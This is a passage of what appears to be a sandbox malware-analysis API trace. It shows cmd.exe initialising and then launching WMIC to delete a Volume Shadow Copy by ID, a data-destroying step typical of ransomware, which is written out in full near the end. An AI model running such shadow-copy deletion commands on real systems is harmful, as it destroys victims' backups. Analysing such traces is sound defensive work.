lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae848 | out: phkResult=0x2ae848*=0x44) returned 0x0 [0105.234] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae840, lpData=0x2ae860, lpcbData=0x2ae844*=0x1000 | out: lpType=0x2ae840*=0x0, lpData=0x2ae860*=0x18, lpcbData=0x2ae844*=0x1000) returned 0x2 [0105.234] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae840, lpData=0x2ae860, lpcbData=0x2ae844*=0x1000 | out: lpType=0x2ae840*=0x4, lpData=0x2ae860*=0x1, lpcbData=0x2ae844*=0x4) returned 0x0 [0105.234] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae840, lpData=0x2ae860, lpcbData=0x2ae844*=0x1000 | out: lpType=0x2ae840*=0x0, lpData=0x2ae860*=0x1, lpcbData=0x2ae844*=0x1000) returned 0x2 [0105.234] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae840, lpData=0x2ae860, lpcbData=0x2ae844*=0x1000 | out: lpType=0x2ae840*=0x4, lpData=0x2ae860*=0x0, lpcbData=0x2ae844*=0x4) returned 0x0 [0105.234] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae840, lpData=0x2ae860, lpcbData=0x2ae844*=0x1000 | out: lpType=0x2ae840*=0x4, lpData=0x2ae860*=0x40, lpcbData=0x2ae844*=0x4) returned 0x0 [0105.234] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae840, lpData=0x2ae860, lpcbData=0x2ae844*=0x1000 | out: lpType=0x2ae840*=0x4, lpData=0x2ae860*=0x40, lpcbData=0x2ae844*=0x4) returned 0x0 [0105.235] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae840, lpData=0x2ae860, lpcbData=0x2ae844*=0x1000 | out: lpType=0x2ae840*=0x0, lpData=0x2ae860*=0x40, lpcbData=0x2ae844*=0x1000) returned 0x2 [0105.235] RegCloseKey (hKey=0x44) returned 0x0 [0105.235] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae848 | out: phkResult=0x2ae848*=0x44) returned 0x0 [0105.235] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae840, lpData=0x2ae860, lpcbData=0x2ae844*=0x1000 | out: lpType=0x2ae840*=0x0, lpData=0x2ae860*=0x40, lpcbData=0x2ae844*=0x1000) returned 0x2 [0105.235] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae840, lpData=0x2ae860, lpcbData=0x2ae844*=0x1000 | out: lpType=0x2ae840*=0x4, lpData=0x2ae860*=0x1, lpcbData=0x2ae844*=0x4) returned 0x0 [0105.235] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae840, lpData=0x2ae860, lpcbData=0x2ae844*=0x1000 | out: lpType=0x2ae840*=0x0, lpData=0x2ae860*=0x1, lpcbData=0x2ae844*=0x1000) returned 0x2 [0105.235] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae840, lpData=0x2ae860, lpcbData=0x2ae844*=0x1000 | out: lpType=0x2ae840*=0x4, lpData=0x2ae860*=0x0, lpcbData=0x2ae844*=0x4) returned 0x0 [0105.235] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae840, lpData=0x2ae860, lpcbData=0x2ae844*=0x1000 | out: lpType=0x2ae840*=0x4, lpData=0x2ae860*=0x9, lpcbData=0x2ae844*=0x4) returned 0x0 [0105.235] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae840, lpData=0x2ae860, lpcbData=0x2ae844*=0x1000 | out: lpType=0x2ae840*=0x4, lpData=0x2ae860*=0x9, lpcbData=0x2ae844*=0x4) returned 0x0 [0105.235] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae840, lpData=0x2ae860, lpcbData=0x2ae844*=0x1000 | out: lpType=0x2ae840*=0x0, lpData=0x2ae860*=0x9, lpcbData=0x2ae844*=0x1000) returned 0x2 [0105.235] RegCloseKey (hKey=0x44) returned 0x0 [0105.235] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51744d [0105.235] srand (_Seed=0x5f51744d) [0105.235] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete" [0105.235] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete" [0105.235] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab4c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0105.236] GetProcessHeap () returned 0x470000 [0105.236] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x218) returned 0x48ab40 [0105.236] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x48ab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0105.236] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0105.236] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0105.236] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0105.236] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0105.236] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0105.236] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0105.236] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0105.236] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0105.236] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0105.236] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0105.236] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0105.236] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0105.236] GetProcessHeap () returned 0x470000 [0105.236] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489620 | out: hHeap=0x470000) returned 1 [0105.236] GetEnvironmentStringsW () returned 0x488b90* [0105.236] GetProcessHeap () returned 0x470000 [0105.236] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa94) returned 0x48ad60 [0105.236] FreeEnvironmentStringsW (penv=0x488b90) returned 1 [0105.237] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.237] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0105.237] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0105.237] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0105.237] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0105.237] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0105.237] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0105.237] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0105.237] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0105.237] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0105.237] GetProcessHeap () returned 0x470000 [0105.237] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x5c) returned 0x48b800 [0105.237] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af650 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0105.237] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2af650, lpFilePart=0x2af630 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2af630*="Desktop") returned 0x25 [0105.237] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0105.237] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af360 | out: lpFindFileData=0x2af360*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x48b870 [0105.237] FindClose (in: hFindFile=0x48b870 | out: hFindFile=0x48b870) returned 1 [0105.237] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2af360 | out: lpFindFileData=0x2af360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x48b870 [0105.238] FindClose (in: hFindFile=0x48b870 | out: hFindFile=0x48b870) returned 1 [0105.238] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0105.238] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2af360 | out: lpFindFileData=0x2af360*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x48b870 [0105.238] FindClose (in: hFindFile=0x48b870 | out: hFindFile=0x48b870) returned 1 [0105.238] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0105.238] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0105.238] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.238] GetProcessHeap () returned 0x470000 [0105.238] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48ad60 | out: hHeap=0x470000) returned 1 [0105.238] GetEnvironmentStringsW () returned 0x48b870* [0105.238] GetProcessHeap () returned 0x470000 [0105.238] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xae8) returned 0x48c360 [0105.238] FreeEnvironmentStringsW (penv=0x48b870) returned 1 [0105.238] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab4c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0105.238] GetProcessHeap () returned 0x470000 [0105.238] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48b800 | out: hHeap=0x470000) returned 1 [0105.238] GetProcessHeap () returned 0x470000 [0105.239] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4016) returned 0x48ce50 [0105.239] GetProcessHeap () returned 0x470000 [0105.239] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe4) returned 0x489680 [0105.239] GetProcessHeap () returned 0x470000 [0105.239] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48ce50 | out: hHeap=0x470000) returned 1 [0105.239] GetConsoleOutputCP () returned 0x1b5 [0105.239] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0105.239] GetUserDefaultLCID () returned 0x409 [0105.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ab47b50, cchData=8 | out: lpLCData=":") returned 2 [0105.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af760, cchData=128 | out: lpLCData="0") returned 2 [0105.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af760, cchData=128 | out: lpLCData="0") returned 2 [0105.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af760, cchData=128 | out: lpLCData="1") returned 2 [0105.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ab5a740, cchData=8 | out: lpLCData="/") returned 2 [0105.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ab5a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0105.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ab5a460, cchData=32 | out: lpLCData="Tue") returned 4 [0105.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ab5a420, cchData=32 | out: lpLCData="Wed") returned 4 [0105.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ab5a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0105.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ab5a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0105.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ab5a360, cchData=32 | out: lpLCData="Sat") returned 4 [0105.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ab5a700, cchData=32 | out: lpLCData="Sun") returned 4 [0105.240] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ab47b40, cchData=8 | out: lpLCData=".") returned 2 [0105.240] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ab5a4e0, cchData=8 | out: lpLCData=",") returned 2 [0105.240] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0105.241] GetProcessHeap () returned 0x470000 [0105.241] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20c) returned 0x4897e0 [0105.241] GetConsoleTitleW (in: lpConsoleTitle=0x4897e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.241] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0105.241] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0105.241] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0105.241] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0105.242] GetProcessHeap () returned 0x470000 [0105.242] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4012) returned 0x48ce50 [0105.242] GetProcessHeap () returned 0x470000 [0105.242] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48ce50 | out: hHeap=0x470000) returned 1 [0105.244] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0105.244] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0105.244] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0105.244] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0105.244] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0105.244] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0105.244] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0105.244] GetProcessHeap () returned 0x470000 [0105.244] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb0) returned 0x489a00 [0105.244] GetProcessHeap () returned 0x470000 [0105.244] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x54) returned 0x489ac0 [0105.246] GetProcessHeap () returned 0x470000 [0105.246] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x9e) returned 0x489b20 [0105.247] GetConsoleTitleW (in: lpConsoleTitle=0x2af670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.247] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.247] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.248] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af200, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af1e0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af1e0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0105.248] GetProcessHeap () returned 0x470000 [0105.248] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x218) returned 0x489bd0 [0105.248] GetProcessHeap () returned 0x470000 [0105.248] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe2) returned 0x489df0 [0105.248] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0105.248] GetProcessHeap () returned 0x470000 [0105.248] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x420) returned 0x471320 [0105.248] SetErrorMode (uMode=0x0) returned 0x8001 [0105.248] SetErrorMode (uMode=0x1) returned 0x0 [0105.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x471330, lpFilePart=0x2aef00 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x2aef00*="wbem") returned 0x18 [0105.248] SetErrorMode (uMode=0x8001) returned 0x1 [0105.248] GetProcessHeap () returned 0x470000 [0105.248] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x471320, Size=0x54) returned 0x471320 [0105.249] GetProcessHeap () returned 0x470000 [0105.249] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x471320) returned 0x54 [0105.249] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0105.249] GetProcessHeap () returned 0x470000 [0105.249] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x48) returned 0x489ee0 [0105.249] GetProcessHeap () returned 0x470000 [0105.249] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x7c) returned 0x489f30 [0105.249] GetProcessHeap () returned 0x470000 [0105.249] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x489f30, Size=0x48) returned 0x489f30 [0105.249] GetProcessHeap () returned 0x470000 [0105.249] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x489f30) returned 0x48 [0105.249] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0105.249] GetProcessHeap () returned 0x470000 [0105.249] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe8) returned 0x489f90 [0105.252] GetProcessHeap () returned 0x470000 [0105.252] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x489f90, Size=0x7e) returned 0x489f90 [0105.252] GetProcessHeap () returned 0x470000 [0105.252] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x489f90) returned 0x7e [0105.253] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.253] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x2aec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec70) returned 0x48a020 [0105.254] GetProcessHeap () returned 0x470000 [0105.254] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x28) returned 0x4846c0 [0105.254] FindClose (in: hFindFile=0x48a020 | out: hFindFile=0x48a020) returned 1 [0105.254] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0105.254] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0105.254] GetConsoleTitleW (in: lpConsoleTitle=0x2af1c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.254] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aef78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aef38 | out: lpAttributeList=0x2aef78, lpSize=0x2aef38) returned 1 [0105.254] UpdateProcThreadAttribute (in: lpAttributeList=0x2aef78, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aef28, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aef78, lpPreviousValue=0x0) returned 1 [0105.254] GetStartupInfoW (in: lpStartupInfo=0x2af090 | out: lpStartupInfo=0x2af090*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0105.254] GetProcessHeap () returned 0x470000 [0105.254] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x20) returned 0x4846f0 [0105.254] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0105.254] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0105.254] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0105.254] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.254] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.254] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.254] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0105.254] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0105.255] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0105.255] GetProcessHeap () returned 0x470000 [0105.255] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4846f0 | out: hHeap=0x470000) returned 1 [0105.255] GetProcessHeap () returned 0x470000 [0105.255] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12) returned 0x488a30 [0105.256] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0105.256] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2aefb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aef60 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete", lpProcessInformation=0x2aef60*(hProcess=0x54, hThread=0x50, dwProcessId=0x5bc, dwThreadId=0x83c)) returned 1 